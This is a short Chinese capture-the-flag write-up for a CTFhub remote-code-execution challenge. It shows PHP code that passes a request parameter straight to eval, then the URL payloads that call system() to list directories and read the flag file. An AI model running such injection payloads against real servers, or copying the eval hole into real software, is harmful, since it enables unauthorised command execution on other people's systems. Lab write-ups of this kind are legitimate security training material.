CTFhub-RCE-evel执行

携柺星年2023-11-13 11:42

访问目标地址:

<?php

if (isset($_REQUEST['cmd'])) {

eval($_REQUEST["cmd"]);

} else {

highlight_file(FILE);

}

?>

根据PHP代码显示,要求将命令赋值给cmd然后执行

先查看一下根目录文件 /?cmd=system("ls");
!切记最后的分号不可省略!

没有需要的文件

看看上一级的文件夹 /?cmd=system("ls /");
!切记最后的分号不可省略!

打开flag文件发现FLAG /?cmd=system("cat /flag_8668");
!切记最后的分号不可省略!

相关推荐
市场部需要一个软件开发岗位2 分钟前
一个无人机平台+算法监督平台的离线部署指南
java·python·算法·bash·无人机·持续部署
凤山老林3 分钟前
SpringBoot + MyBatis-Plus 如何高效实现数据变更记录
java·spring boot·mybatis
Vivienne_ChenW7 分钟前
Spring 事件驱动用法总结
java·开发语言·spring boot·spring
毕设源码-邱学长14 分钟前
【开题答辩全过程】以 基于Springboot个人健康运动系统的设计与实现为例,包含答辩的问题和答案
java·spring boot·后端
愿你天黑有灯下雨有伞14 分钟前
Spring Boot + FastExcel:打造完美的导入校验功能
java·spring boot·后端
Rainly200015 分钟前
java原生实现企业级spring batch数据迁移
java·spring·batch
小马_xiaoen16 分钟前
Promise 从入门到精通:彻底解决前端异步回调问题!!!
前端·javascript
jingling55518 分钟前
uniapp | 基于高德地图实现位置选择功能(安卓端)
android·前端·javascript·uni-app
綦枫Maple19 分钟前
IDEA选择“在当前窗口打开”还是“新窗口打开”的提示不见了,如何恢复?
java·ide·intellij-idea
热门推荐
01GitHub 镜像站点02一文了解国产算子编程语言 TileLang,TileLang 对国产开源生态的影响与启示03Vue-skills的中文文档04Claude Code Skills 实用使用手册05OpenCode 入门教程:介绍 · 安装 · 配置第三方 API (如 Claude)06UV安装并设置国内源07OpenClaw部署与配置教程:在Mac mini上接入国产大模型与飞书08Clawdbot 中文汉化版 接入微信、飞书09让 Trae IDE 智能体 “读懂”文档 Excel+PDF+DOCX :mcp-documents-reader 工具使用指南10在Trae中使用Pencil MCP